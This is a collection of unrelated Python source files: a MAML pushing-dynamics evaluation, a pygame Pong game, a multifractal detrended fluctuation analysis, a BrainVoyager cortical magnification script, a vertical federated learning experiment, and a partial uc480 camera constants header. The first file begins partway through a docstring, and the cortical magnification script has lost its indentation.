    naive persistence baseline, for horizons 1..max_horiz steps (0.01 s each).

    Assumes ``bg`` bundles test data, structures, a MAML runner and
    normalizers (bg.T.MTEST, bg.S.TestStructures, bg.run_MAML, bg.D) —
    TODO confirm against the class providing ``bg``. Requires CUDA.
    """
    test_data = bg.T.MTEST
    test_ans = bg.MTestAnswers
    test_structures = bg.S.TestStructures
    plt.switch_backend("Qt5Agg")
    DATA = h5py.File("pushing.hdf5", "r")
    sse = np.zeros((max_horiz,))
    sse_base = np.zeros((max_horiz,))
    for i, (data, structure) in enumerate(zip(test_data, test_structures)):
        # Adapt to this task; keep the adapted weights and composer network.
        _, _, _, _, _, weights, composer = bg.run_MAML(structure, data,
                                                       ret_weights=True)
        inp = DATA[data.name + "-IN"]
        out = DATA[data.name + "-OUT"]
        # 3 output values per object; inputs use 6 values per object
        # (presumably x, y, dx, dy, theta, dtheta — TODO confirm layout).
        nobj = out.shape[1] // 3
        curr_state = inp
        n_datapoints = 0
        for k in range(max_horiz):
            inp_tensor = bg.D.normalize_input(torch.from_numpy(curr_state[:-1,:])
                                              .float().cuda())
            out_tensor = composer.forward_with_weights(inp_tensor, weights)
            pred_out = bg.D.denormalize_output(out_tensor).cpu().detach().numpy()
            # Roll the state one step forward using the predicted deltas.
            next_state = np.zeros((curr_state.shape[0]-1, curr_state.shape[1]))
            next_state[:, -6:] = curr_state[1:, -6:]
            for j in range(nobj):
                next_state[:, 6*j:6*j+2] = (curr_state[:-1, 6*j:6*j+2]
                                            + pred_out[:, 3*j:3*j+2])
                next_state[:, 6*j+2:6*j+4] = pred_out[:, 3*j:3*j+2]
                next_state[:, 6*j+4] = (curr_state[:-1, 6*j+4] + pred_out[:, 3*j+2])
                next_state[:, 6*j+5] = pred_out[:, 3*j+2]
                # Accumulate squared error of the rollout vs ground truth,
                # and of the persistence baseline (state frozen at t).
                sse[k] += np.sum((next_state[:, 6*j:6*j+2] - inp[k+1:, 6*j:6*j+2])**2,
                                 axis=None)
                sse_base[k] += np.sum((inp[:-(k+1), 6*j:6*j+2] - inp[k+1:, 6*j:6*j+2])**2,
                                      axis=None)
                sse[k] += np.sum((next_state[:, 6*j+4] - inp[k+1:, 6*j+4])**2,
                                 axis=None)
                sse_base[k] += np.sum((inp[:-(k+1), 6*j+4] - inp[k+1:, 6*j+4])**2,
                                      axis=None)
            n_datapoints += 3*next_state.shape[0]
            curr_state = next_state
    # NOTE(review): n_datapoints is reset per task, so only the LAST task's
    # total (summed over all horizons) normalizes sse here, while each sse[k]
    # accumulates over all tasks — confirm this normalization is intended.
    rmses = np.sqrt(sse/n_datapoints)
    rmses_base = np.sqrt(sse_base/n_datapoints)
    fig = plt.figure()
    ax = fig.gca()
    ax.plot(np.linspace(0.01, max_horiz*0.01, max_horiz), rmses)
    ax.plot(np.linspace(0.01, max_horiz*0.01, max_horiz), rmses_base)
    ax.legend(["Ours", "Naive Baseline"])
    ax.set_xlabel("Prediction Horizon (s)")
    ax.set_ylabel("RMSE")
    ax.set_title("Pushing prediction error")
    plt.show()
def save_predicted_trajs(bg, out_dir):
    """Roll out 299 predicted steps for each test task and save each rollout
    as a Klampt Trajectory (.traj) file in ``out_dir``. Requires CUDA.
    """
    test_data = bg.T.MTEST
    test_structures = bg.S.TestStructures
    DATA = h5py.File("pushing.hdf5", "r")
    for i, (data, structure) in enumerate(zip(test_data, test_structures)):
        _, _, _, _, _, weights, composer = bg.run_MAML(structure, data,
                                                       ret_weights=True)
        inp = DATA[data.name + "-IN"]
        out = DATA[data.name + "-OUT"]
        nobj = out.shape[1] // 3
        curr_state = inp
        # Milestone layout: pusher xy, then (x, y, theta) per object —
        # presumably; TODO confirm against the state encoding.
        milestones = np.zeros((299, 2 + 3*nobj))
        for k in range(299):
            # Record the first row of the current (rolled-out) state.
            milestones[k, :2] = curr_state[0, -6:-4]
            for j in range(nobj):
                milestones[k, 2+3*j:4+3*j] = curr_state[0, 6*j:6*j+2]
                milestones[k, 4+3*j] = curr_state[0, 6*j+4]
            inp_tensor = bg.D.normalize_input(torch.from_numpy(curr_state[:-1,:])
                                              .float().cuda())
            out_tensor = composer.forward_with_weights(inp_tensor, weights)
            pred_out = bg.D.denormalize_output(out_tensor).cpu().detach().numpy()
            # Advance the state one step using the predicted deltas.
            next_state = np.zeros((curr_state.shape[0]-1, curr_state.shape[1]))
            next_state[:, -6:] = curr_state[1:, -6:]
            for j in range(nobj):
                next_state[:, 6*j:6*j+2] = (curr_state[:-1, 6*j:6*j+2]
                                            + pred_out[:, 3*j:3*j+2])
                next_state[:, 6*j+2:6*j+4] = pred_out[:, 3*j:3*j+2]
                next_state[:, 6*j+4] = (curr_state[:-1, 6*j+4] + pred_out[:, 3*j+2])
                next_state[:, 6*j+5] = pred_out[:, 3*j+2]
            curr_state = next_state
        traj = Trajectory(times=np.linspace(0.01, 2.99, 299), milestones=milestones)
        save_name = os.path.join(out_dir, "pred_pose_" + data.name +".traj")
        save(traj, 'auto', save_name)
|
import pygame
import os
import time
class Walls:
    """Static rectangular wall drawn on the module-level `screen` surface."""
    def __init__(self, pos, size, color):
        self.pos = pos
        self.size = size
        self.color = color
        # Rect kept for collision queries by callers (e.g. the ball).
        self.rect = pygame.Rect(pos[0], pos[1], size[0], size[1])
    def draw(self):
        # Draws from the original pos/size (the rect is not consulted here).
        pygame.draw.rect(screen, self.color, (self.pos, self.size))
class Paddles:
    """Player paddle; moves vertically in steps of `vel` pixels."""
    def __init__(self, pos, size, color, vel):
        self.starting_pos = pos
        self.pos_x = int(pos[0])
        self.pos_y = int(pos[1])
        self.size = size
        self.color = color
        self.vel = vel
        self.rect = pygame.Rect(self.pos_x, self.pos_y, size[0], size[1])
    def update(self, pos_y):
        # pos_y is a signed delta, not an absolute position.
        self.pos_y += pos_y
        self.rect.topleft = (self.pos_x, self.pos_y)
    def draw(self):
        pygame.draw.rect(screen, self.color, (self.rect.topleft, self.size))
class Balls:
    """The pong ball: position, velocity (dx/dy), score, and a dead flag
    set when it gets past a paddle."""
    def __init__(self, pos, size, color):
        self.pos = pos
        self.pos_x = pos[0]
        self.pos_y = pos[1]
        self.size = size
        self.color = color
        self.dx = 1
        self.dy = 1
        self.dead = False
        self.points = 0
    def draw(self):
        pygame.draw.circle(screen, self.color, (self.pos_x, self.pos_y), self.size)
    def update_ball_1p(self, leftp, rightp):
        """Single-player step: left side bounces off a wall, right side is a paddle."""
        self.pos_x += self.dx
        self.pos_y += self.dy
        # Bounce off the bottom wall (pygame y grows downward)
        if self.pos_y > screenHeight - 20:
            self.pos_y -= 5
            self.dy *= -1
        # Bounce off the top wall
        elif self.pos_y < 25:
            self.pos_y += 5
            self.dy *= -1
        # Right side: in this mode it is the paddle
        if self.pos_x >= rightp.pos_x:
            if rightp.rect.collidepoint((self.pos_x, self.pos_y)):
                self.pos_x -= 5
                self.dx *= -1
                self.points += 1
            else:
                # Missed the paddle: mark the ball as dead
                self.dead = True
        # Left wall (or player)
        elif leftp.rect.collidepoint((self.pos_x, self.pos_y)):
            self.pos_x += 5
            self.dx *= -1
    def update_ball_2p(self, leftp, rightp):
        """Two-player step: both sides are paddles; missing either kills the ball."""
        self.pos_x += self.dx
        self.pos_y += self.dy
        # Bounce off the bottom wall (pygame y grows downward)
        if self.pos_y > screenHeight - 20:
            self.pos_y -= 5
            self.dy *= -1
        # Bounce off the top wall
        elif self.pos_y < 25:
            self.pos_y += 5
            self.dy *= -1
        # Right side: in this mode it is a paddle
        if self.pos_x >= rightp.pos_x:
            if rightp.rect.collidepoint((self.pos_x, self.pos_y)):
                self.pos_x -= 5
                self.dx *= -1
            else:
                # Missed the paddle: mark the ball as dead
                self.dead = True
        # Left side: the other player's paddle
        if self.pos_x <= leftp.pos_x:
            if leftp.rect.collidepoint((self.pos_x, self.pos_y)):
                self.pos_x += 5
                self.dx *= -1
            else:
                self.dead = True
####################################################
# x, y position where to show the window
windowPosition = (20, 43)
os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % windowPosition
screenWidth, screenHeight = 1000, 640
# Colour palette (RGB tuples)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
GRAY = (200, 200, 200)
GRAYB = (150, 150, 150)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
ORANGY = (255, 204, 0)
LBLUISH = (0, 255, 153)
PADDLE_COLOR = WHITE
WALLS_COLOR = (0, 204, 255) # (0, 153, 204)
pygame.init()
screen = pygame.display.set_mode((screenWidth, screenHeight))
pygame.display.set_caption('Pong')
font = pygame.font.Font(None, 50)
####################################################
# Game objects shared by all scenes (module-level globals).
paddleR = Paddles((screenWidth - 30, screenHeight / 2), (20, 100), PADDLE_COLOR, 2)
paddleL = Paddles((10, screenHeight / 2), (20, 100), PADDLE_COLOR, 2)
ball = Balls((100, 100), 10, WHITE)
# Single-player walls: index 1 is the left wall the ball bounces off.
walls_single = [Walls((screenWidth - 5, 0), (20, screenHeight), ORANGY),
                Walls((0, 0), (20, screenHeight), WALLS_COLOR),
                Walls((0, screenHeight - 20), (screenWidth, 20), WALLS_COLOR),
                Walls((0, 0), (screenWidth, 20), WALLS_COLOR)]
walls_twop = [Walls((screenWidth - 5, 0), (20, screenHeight), ORANGY),
              Walls((-15, 0), (20, screenHeight), ORANGY),
              Walls((0, screenHeight - 20), (screenWidth, 20), WALLS_COLOR),
              Walls((0, 0), (screenWidth, 20), WALLS_COLOR)]
def main_scene():
    """Show the start menu; return True for 2-player mode, False for 1-player.

    Bug fix: previously a QUIT event only broke the loop and fell through to
    ``return False``, so closing the window launched single-player mode.
    Now QUIT shuts pygame down and exits the program.
    """
    single_player = font.render("1 Player", True, WHITE)
    single_rect = single_player.get_rect()
    single_rect.center = (int(screenWidth / 2), 305)
    two_player = font.render("2 Players", True, WHITE)
    two_rect = two_player.get_rect()
    two_rect.center = (int(screenWidth / 2), 345)
    while True:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                # Close the window instead of silently starting a game.
                pygame.quit()
                raise SystemExit
            if event.type == pygame.MOUSEBUTTONDOWN:
                if single_rect.collidepoint(event.pos):
                    return False
                elif two_rect.collidepoint(event.pos):
                    return True
        screen.fill(LBLUISH)
        screen.blit(single_player, single_rect)
        screen.blit(two_player, two_rect)
        pygame.display.flip()
def dead_scene():
    """Game-over screen: pressing R resets the ball and returns True so the
    caller's loop continues; closing the window returns False to stop it."""
    retry = font.render("Press R to try again", True, WHITE)
    retry_pos = retry.get_rect()
    retry_pos.center = (int(screenWidth / 2), int(screenHeight / 2))
    menu_btn = font.render("Main menu", True, WHITE)
    menu_btnpos = menu_btn.get_rect()
    menu_btnpos.topleft = (30, 30)
    dead = True
    while dead:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
                return running
            # if event.type == pygame.MOUSEBUTTONDOWN:
            # if menu_btnpos.collidepoint(event.type):
            # main_menu = True
        keys = pygame.key.get_pressed()
        if keys[pygame.K_r]:
            # Reset ball to the centre, flip direction, clear the score.
            ball.dead = False
            ball.pos_x, ball.pos_y = 500, 320
            ball.dx *= -1
            ball.dy *= -1
            ball.points = 0
            running = True
            # Debounce so the held key does not trigger again immediately.
            time.sleep(0.2)
            return running
        screen.fill(LBLUISH)
        screen.blit(menu_btn, menu_btnpos)
        screen.blit(retry, retry_pos)
        pygame.display.flip()
def singleplayer():
    """Main loop for 1-player mode: arrow keys move the right paddle; the
    left wall returns the ball."""
    # (original note, translated: "not sure whether this is needed or what it does")
    # pygame.time.delay(5)
    running = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
        if ball.dead:
            running = dead_scene()
        keys = pygame.key.get_pressed()
        # Clamp paddle movement so it stays inside the top/bottom walls.
        if keys[pygame.K_UP] and paddleR.pos_y - 25 > paddleR.vel:
            paddleR.update(-paddleR.vel)
        if keys[pygame.K_DOWN] and paddleR.pos_y < screenHeight - paddleR.size[1] - 25:
            paddleR.update(paddleR.vel)
        screen.fill(LBLUISH)
        for wal in walls_single:
            wal.draw()
        paddleR.draw()
        # walls_single[1] is the left wall that bounces the ball back.
        ball.update_ball_1p(walls_single[1], paddleR)
        ball.draw()
        points = font.render(f"Score: {str(ball.points)}", True, WHITE)
        screen.blit(points, (50, 30))
        pygame.display.flip()
def twoplayers():
    """Main loop for 2-player mode: W/S move the left paddle, arrow keys the right."""
    running = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
        if ball.dead:
            running = dead_scene()
        keys = pygame.key.get_pressed()
        # Clamp both paddles so they stay inside the top/bottom walls.
        if keys[pygame.K_UP] and paddleR.pos_y - 25 > paddleR.vel:
            paddleR.update(-paddleR.vel)
        if keys[pygame.K_DOWN] and paddleR.pos_y < screenHeight - paddleR.size[1] - 25:
            paddleR.update(paddleR.vel)
        if keys[pygame.K_w] and paddleL.pos_y - 25 > paddleL.vel:
            paddleL.update(-paddleL.vel)
        if keys[pygame.K_s] and paddleL.pos_y < screenHeight - paddleL.size[1] - 25:
            paddleL.update(paddleL.vel)
        screen.fill(LBLUISH)
        for wal in walls_twop:
            wal.draw()
        paddleR.draw()
        paddleL.draw()
        ball.update_ball_2p(paddleL, paddleR)
        ball.draw()
        pygame.display.flip()
if __name__ == "__main__":
    # The menu returns which mode was chosen.
    Players = main_scene()
    # True for 2 players, False for 1 player
    if Players:
        twoplayers()
    else:
        singleplayer()
|
# File: DFA.py (source repository: 10-100 GitHub stars)
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 1 14:35:26 2017
@author: picku
This code carries out multifractal detrended fluctuation analysis (MF-DFA) as
described in:
Kantelhardt, <NAME>., et al. "Multifractal detrended fluctuation analysis of
nonstationary time series." Physica A: Statistical Mechanics and its Applications
316.1 (2002): 87-114
Unlike standard DFA, which is used to analyze (mono-) fractal scaling properties
of nonstationary time series, MF-DFA allows for analysis of multi-fractal
nonstationary time series using one additional step - a q dependent averaging
procedure - where q = 2 performs the standard DFA procedure developed in:
<NAME>., et al. "Quantification of scaling exponents and crossover phenomena
in nonstationary heartbeat time series." Chaos: An Interdisciplinary Journal of
Nonlinear Science 5.1 (1995): 82-87
Characterizing the short- and long-range correlation properties of the RR interval
time series (a non-stationary physiological signal) is helpful in determining
fluctuations due to the intrinsic dynamics of the cardio-respiratory system itself
and those fluctuations that arise from external (environmental) stimuli. The scaling
exponent, alpha, can be used to represent the autocorrelation properties of the signal:
alpha < 1/2 : anti-correlated
alpha = 1/2 : uncorrelated (white noise)
alpha > 1/2 : correlated
alpha = 1 : 1/f-noise
alpha > 1 : non-stationary
alpha = 3/2 : Brownian noise (random walk)
"""
import numpy as np
import matplotlib.pyplot as plt
def dfa(timeSeries, scale, q, m):
    '''
    Compute the q-th order fluctuation coefficient F for one window scale
    (one step of MF-DFA; q = 2 reproduces standard DFA).
    Input Arguments :
    -timeSeries : [list] of RR intervals
    -scale : [int] window length in samples
    -m : [int] order of polynomial fit
    -q : [int] order of fluctuation coefficient
    Output Arguments:
    -F : [float] fluctuation coefficient
    Raises:
    -ValueError if the series is shorter than the scale. (Bug fix: the
     original printed a message and implicitly returned None, which made
     callers fail later with a confusing TypeError.)
    '''
    if len(timeSeries) < scale:
        raise ValueError('Length of time series must be greater than scale')
    # Step(1): Determine the "profile" (integrated signal with subtracted offset)
    integratedSeries = np.cumsum(timeSeries - np.mean(timeSeries)) # y_k
    # Step(2): Divide profile into Ns non-overlapping segments of equal length s
    shape = (int(integratedSeries.shape[0]) // int(scale), int(scale))
    nwLength = shape[0] * shape[1]
    windowedData = np.reshape(integratedSeries[0:int(nwLength)], shape)
    # repeat the same procedure from the opposite end of the integrated series
    # so that no tail samples are discarded
    windowedData2 = np.reshape(integratedSeries[len(integratedSeries) - int(nwLength):], shape)
    segments = np.concatenate((windowedData, windowedData2))
    # Step(3): Calculate local trend for each of the 2Ns segments by a least
    # squares fit, then the RMS of the detrended residuals per segment
    x = np.arange(segments.shape[1])
    rms = np.empty(segments.shape[0])
    for i, segment in enumerate(segments):
        pl = np.polyfit(x, segment, m)
        y_n = np.polyval(pl, x)
        rms[i] = np.sqrt(np.mean((segment - y_n) ** 2))
    # (Step 4): Average over all segments to obtain the qth order fluctuation coefficient
    F = np.mean(rms ** q) ** (1 / q)
    return F
def scalingExponent(timeSeries, lowerScaleLimit, upperScaleLimit, scaleDensity, m, q, plot):
    '''
    Compute the MF-DFA scaling exponent over a log-spaced range of scales.
    Input Arguments :
    - timeSeries : [list] of RR intervals
    - lowerScaleLimit : [int] minimum of scales for MF-DFA
    - upperScaleLimit : [int] maximum of scales for MF-DFA
    - scaleDensity : [int] number of scales between lowerScaleLimit and upperScaleLimit in which DFA is conducted
    - m : [int] order of polynomial fit
    - q : [int] order of fluctuation coefficient
    - plot : [1] --> plot of log(scales) vs log(F)
    Output Arguments :
    - scaleParameter : [float] scaling exponent (alpha / Hurst-type exponent).
      Bug fix: the original documented a return value but never returned it,
      so every call evaluated to None.
    '''
    startBeatNum = np.log(lowerScaleLimit) / np.log(10)
    stopBeatNum = np.log(upperScaleLimit) / np.log(10)
    # Log-spaced, floored window sizes between the two limits.
    scales = np.floor(np.logspace(np.log10(10 ** startBeatNum), np.log10(10 ** stopBeatNum), scaleDensity))
    F = np.zeros(scales.shape[0])
    for j,scale in enumerate(scales):
        F[j] = dfa(timeSeries, int(scale), q, m) #timeSeries = RR series to be analyzed
    # Step(5) Determine scale behavior of the fluctuation functions by analyzing
    # log-log plots of F versus s for each value of q
    pl2 = np.polyfit(np.log2(scales), np.log2(F), 1) # linear fit in log-log space
    lineFit = np.polyval(pl2, np.log2(scales))
    scaleParameter = pl2[0] # scaling exponent (Hurst exponent = h(q = 2))
    if plot == 1:
        plt.loglog(scales, F, '.', markersize = 3)
        plt.plot(scales, 2 ** lineFit, linewidth = 1, label = r'$\alpha$ = %0.2f' % (scaleParameter))
        plt.xlabel(r'$\log_{10}$(scale)')
        plt.ylabel(r'$\log_{10}$(F)')
        plt.title('F vs Scale')
        plt.legend(loc='best')
    # BUG FIX: return the computed exponent (was missing entirely).
    return scaleParameter
|
"""Read Brainvoyager srf & smp files to compute cortical magnification."""
import os
import numpy as np
from copy import copy
import bvbabel
FILE_SRF = "/home/faruk/Documents/test_bvbabel/SRF/surface.srf"
FILE_SMP = "/home/faruk/Documents/test_bvbabel/SRF/maps.smp"
# These values are required to compute vertex-wise distance in mm
VMR_IMAGE_DIMS = 512 # Stands for e.g. 512 x 512 x 512, or 256 x 256 x 256
VMR_VOXEL_DIMS = 0.4 # Stands for e.g 0.4 x 0.4 x 0.4 mm^3 ot 1 x 1 x 1 mm^3
# =============================================================================
# Load files
header_srf, data_srf = bvbabel.srf.read_srf(FILE_SRF)
header_smp, data_smp = bvbabel.smp.read_smp(FILE_SMP)
# Get vertex coordinates (2D numpy array)
vtx = data_srf["vertices"]
# Get vertex neighbors (python list)
nbr = data_srf["vertex neighbors"]
# Get PRF mapping visual field c & y coordinates
print(header_smp["Map"][1]["Name"])
print(header_smp["Map"][2]["Name"])
prf_xy = data_smp[:, 1:3]
# -----------------------------------------------------------------------------
print("Computing cortical magnification factors...")
# Prepare useful variables
nr_vtx = header_srf["Nr vertices"]
map_cmf = np.zeros(nr_vtx)
# Compute cortical magnification for each vertex
for v in range(nr_vtx):
if prf_xy[v, 0] != 0 and prf_xy[v, 1] != 0:
cmf_sum = 0
n_count = 0
for n in nbr[v][1:]: # Loop over neighbor vertices
# Compute vertex to vertex mesh distance
dist_cortex = np.linalg.norm(vtx[v, :] - vtx[n, :])
# Convert vertex to vertex mesh distance to millimeters
dist_cortex *= (VMR_IMAGE_DIMS / 256) * VMR_VOXEL_DIMS
# Compute vertex to vertex PRF xy coordinates distance
dist_vfield = np.linalg.norm(prf_xy[v, :] - prf_xy[n, :])
# Compute cortical magnification factor (CMF)
# NOTE: CMF = "mm of cortical surface" / "degree of visual angle"
if dist_vfield > 0:
cmf_sum += dist_cortex / dist_vfield
n_count += 1
# Normalize cumulative CMF with the number of non-zero neighbours
if cmf_sum > 0:
cmf = cmf_sum / n_count
# Put the vertex-wise average CMF into smp map format
map_cmf[v] = cmf
else:
map_cmf[v] = 0
# -----------------------------------------------------------------------------
# Prepare new SMP map
header_smp["Nr maps"] += 1
header_smp["Map"].append(copy(header_smp["Map"][4]))
header_smp["Map"][-1]["Name"] = "CMF, UseThreshMap: R"
header_smp["Map"][-1]["Threshold min"] = 0.001
header_smp["Map"][-1]["Threshold max"] = 5.
header_smp["Map"][-1]["LUT file"] = "default_v21_inv.olt"
data_smp = np.hstack([data_smp, map_cmf[:, None]])
# Add reciprocal of CMF as it linearly increases with eccentricity
header_smp["Nr maps"] += 1
header_smp["Map"].append(copy(header_smp["Map"][4]))
header_smp["Map"][-1]["Name"] = "CMF reciprocal, UseThreshMap: R"
header_smp["Map"][-1]["Threshold min"] = 0.001
header_smp["Map"][-1]["Threshold max"] = 1.5
header_smp["Map"][-1]["LUT file"] = "default_v21_inv.olt"
map_cmf[map_cmf > 0] = 1 / map_cmf[map_cmf > 0] # Reciprocal of non-zeros
data_smp = np.hstack([data_smp, map_cmf[:, None]])
# Save SMP
basename = FILE_SMP.split(os.extsep, 1)[0]
outname = "{}_bvbabel-CMF.smp".format(basename)
bvbabel.smp.write_smp(outname, header_smp, data_smp)
print("Finished.")
|
# Repository: Alex-Roudjiat/Federated-ML-AI-Federated-ML-
import os
import sys
from sklearn.utils import shuffle
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "../../../")))
from fedml_api.data_preprocessing.NUS_WIDE.nus_wide_dataset import NUS_WIDE_load_two_party_data
from fedml_api.standalone.classical_vertical_fl.vfl_fixture import FederatedLearningFixture
from fedml_api.standalone.classical_vertical_fl.party_models import VFLGuestModel, VFLHostModel
from fedml_api.model.finance.vfl_models_standalone import LocalModel, DenseModel
from fedml_api.standalone.classical_vertical_fl.vfl import VerticalMultiplePartyLogisticRegressionFederatedLearning
def run_experiment(train_data, test_data, batch_size, learning_rate, epoch):
    """Wire up a two-party vertical federated-learning setup and train it.

    train_data / test_data are (Xa, Xb, y) triples where party A holds Xa
    and the labels y, and party B holds Xb. The signature and all console
    output are unchanged from the original implementation.
    """
    print("hyper-parameters:")
    print("batch size: {0}".format(batch_size))
    print("learning rate: {0}".format(learning_rate))

    Xa_train, Xb_train, y_train = train_data
    Xa_test, Xb_test, y_test = test_data

    print("################################ Wire Federated Models ############################")
    # One local representation model per party, both projecting to 60 dims.
    local_a = LocalModel(input_dim=Xa_train.shape[1], output_dim=60, learning_rate=learning_rate)
    local_b = LocalModel(input_dim=Xb_train.shape[1], output_dim=60, learning_rate=learning_rate)
    # Each party holds its slice of the shared logistic-regression head; only
    # party A carries the bias term because only party A has the labels.
    dense_a = DenseModel(local_a.get_output_dim(), 1, learning_rate=learning_rate, bias=True)
    dense_b = DenseModel(local_b.get_output_dim(), 1, learning_rate=learning_rate, bias=False)

    guest = VFLGuestModel(local_model=local_a)
    guest.set_dense_model(dense_a)
    host = VFLHostModel(local_model=local_b)
    host.set_dense_model(dense_b)

    host_id = "B"
    federation = VerticalMultiplePartyLogisticRegressionFederatedLearning(guest)
    federation.add_party(id=host_id, party_model=host)
    federation.set_debug(is_debug=False)

    print("################################ Train Federated Models ############################")
    fixture = FederatedLearningFixture(federation)
    # Only party A owns labels (Y); every other party contributes features (X)
    # via 'party_list'. With two parties, 'party_list' holds only party B's X.
    main_id = federation.get_main_party_id()
    train_data = {main_id: {"X": Xa_train, "Y": y_train},
                  "party_list": {host_id: Xb_train}}
    test_data = {main_id: {"X": Xa_test, "Y": y_test},
                 "party_list": {host_id: Xb_test}}
    fixture.fit(train_data=train_data, test_data=test_data, epochs=epoch, batch_size=batch_size)
if __name__ == '__main__':
    print("################################ Prepare Data ############################")
    # Load a two-class subset (person vs animal) of NUS-WIDE, already split
    # into party A / party B feature blocks plus labels by the loader.
    data_dir = "../../../data/NUS_WIDE"
    class_lbls = ['person', 'animal']
    train, test = NUS_WIDE_load_two_party_data(data_dir, class_lbls, neg_label=0)
    Xa_train, Xb_train, y_train = train
    Xa_test, Xb_test, y_test = test

    # Training hyper-parameters.
    batch_size = 128
    epoch = 100
    lr = 0.01

    # Shuffle both parties' features together with the labels so that the
    # rows of Xa, Xb and y stay aligned after shuffling.
    Xa_train, Xb_train, y_train = shuffle(Xa_train, Xb_train, y_train)
    Xa_test, Xb_test, y_test = shuffle(Xa_test, Xb_test, y_test)
    train = [Xa_train, Xb_train, y_train]
    test = [Xa_test, Xb_test, y_test]
    run_experiment(train_data=train, test_data=test, batch_size=batch_size, learning_rate=lr, epoch=epoch)
|
# Repository: LisaWillig/UDKM_Beamprofiler
"""
.. module: uc480.uc480_h
:platform: Windows, Linux
.. moduleauthor:: <NAME> <<EMAIL>>
Thorlabs' uc480 header file translated to python.
..
This file is part of the uc480 python module.
The uc480 python module is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
The uc480 python module is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with the uc480 python module. If not, see <http://www.gnu.org/licenses/>.
Copyright 2015 <NAME> <<EMAIL>>.
"""
import platform
import ctypes
if platform.system() == "Windows":
import ctypes.wintypes as wt
else:
import wintypes_linux as wt
# ----------------------------------------------------------------------------
# Color modes
# ----------------------------------------------------------------------------
IS_COLORMODE_INVALID = 0
IS_COLORMODE_MONOCHROME = 1
IS_COLORMODE_BAYER = 2
IS_COLORMODE_CBYCRY = 4
# ----------------------------------------------------------------------------
# Sensor Types
# ----------------------------------------------------------------------------
IS_SENSOR_INVALID = 0x0000
# CMOS sensors
IS_SENSOR_C0640R13M = 0x0001 # cmos, 0640x0480, rolling, 1/3", mono,
IS_SENSOR_C0640R13C = 0x0002 # cmos, 0640x0480, rolling, 1/3", color,
IS_SENSOR_C1280R23M = 0x0003 # cmos, 1280x1024, rolling, 1/1.8", mono,
IS_SENSOR_C1280R23C = 0x0004 # cmos, 1280x1024, rolling, 1/1.8", color,
IS_SENSOR_C1600R12C = 0x0008 # cmos, 1600x1200, rolling, 1/2", color,
IS_SENSOR_C2048R12C = 0x000A # cmos, 2048x1536, rolling, 1/2", color,
IS_SENSOR_C2592R12M = 0x000B # cmos, 2592x1944, rolling, 1/2", mono
IS_SENSOR_C2592R12C = 0x000C # cmos, 2592x1944, rolling, 1/2", color
IS_SENSOR_C0640G12M = 0x0010 # cmos, 0640x0480, global, 1/2", mono,
IS_SENSOR_C0640G12C = 0x0011 # cmos, 0640x0480, global, 1/2", color,
IS_SENSOR_C0752G13M = 0x0012 # cmos, 0752x0480, global, 1/3", mono,
IS_SENSOR_C0752G13C = 0x0013 # cmos, 0752x0480, global, 1/3", color,
IS_SENSOR_C1282R13C = 0x0015 # cmos, 1280x1024, rolling, 1/3", color,
IS_SENSOR_C1601R13C = 0x0017 # cmos, 1600x1200, rolling, 1/3.2", color,
IS_SENSOR_C0753G13M = 0x0018 # cmos, 0752x0480, global, 1/3", mono,
IS_SENSOR_C0753G13C = 0x0019 # cmos, 0752x0480, global, 1/3", color,
IS_SENSOR_C0754G13M = 0x0022 # cmos, 0752x0480, global, 1/3", mono, single board (LE)
IS_SENSOR_C0754G13C = 0x0023 # cmos, 0752x0480, global, 1/3", color, single board (LE)
IS_SENSOR_C1284R13C = 0x0025 # cmos, 1280x1024, rolling, 1/3", color, single board (LE))
IS_SENSOR_C1604R13C = 0x0027 # cmos, 1600x1200, rolling, 1/3.2", color, single board (LE)
IS_SENSOR_C1285R12M = 0x0028 # cmos, 1280x1024, rolling, 1/2", mono, single board
IS_SENSOR_C1285R12C = 0x0029 # cmos, 1280x1024, rolling, 1/2", color, single board
IS_SENSOR_C1605R12C = 0x002B # cmos, 1600x1200, rolling, 1/2", color, single board
IS_SENSOR_C2055R12C = 0x002D # cmos, 2048x1536, rolling, 1/2", color, single board
IS_SENSOR_C2595R12M = 0x002E # cmos, 2592x1944, rolling, 1/2", mono, single board
IS_SENSOR_C2595R12C = 0x002F # cmos, 2592x1944, rolling, 1/2", color, single board
IS_SENSOR_C1280R12M = 0x0030 # cmos, 1280x1024, rolling, 1/2", mono,
IS_SENSOR_C1280R12C = 0x0031 # cmos, 1280x1024, rolling, 1/2", color,
IS_SENSOR_C1283R12M = 0x0032 # cmos, 1280x1024, rolling, 1/2", mono, single board
IS_SENSOR_C1283R12C = 0x0033 # cmos, 1280x1024, rolling, 1/2", color, single board
IS_SENSOR_C1603R12M = 0x0034 # cmos, 1600x1200, rolling, 1/2", mono, single board
IS_SENSOR_C1603R12C = 0x0035 # cmos, 1600x1200, rolling, 1/2", color, single board
IS_SENSOR_C2053R12C = 0x0037 # cmos, 2048x1536, rolling, 1/2", color, single board
IS_SENSOR_C2593R12M = 0x0038 # cmos, 2592x1944, rolling, 1/2", mono, single board
IS_SENSOR_C2593R12C = 0x0039 # cmos, 2592x1944, rolling, 1/2", color, single board
IS_SENSOR_C1286R12M = 0x003A # cmos, 1280x1024, rolling, 1/2", mono, single board
IS_SENSOR_C1286R12C = 0x003B # cmos, 1280x1024, rolling, 1/2", color, single board
IS_SENSOR_C1287R12M_WO = 0x003C # cmos, 1280x1024, rolling, 1/2", color, USB board
IS_SENSOR_C1287R12C_WO = 0x003D # cmos, 1280x1024, rolling, 1/2", color, USB board
IS_SENSOR_C3840R12M = 0x003E # cmos, 3840x2760, rolling, 1/2.5", mono
IS_SENSOR_C3840R12C = 0x003F # cmos, 3840x2760, rolling, 1/2.5", color
IS_SENSOR_C3845R12M = 0x0040 # cmos, 3840x2760, rolling, 1/2.5", mono, single board
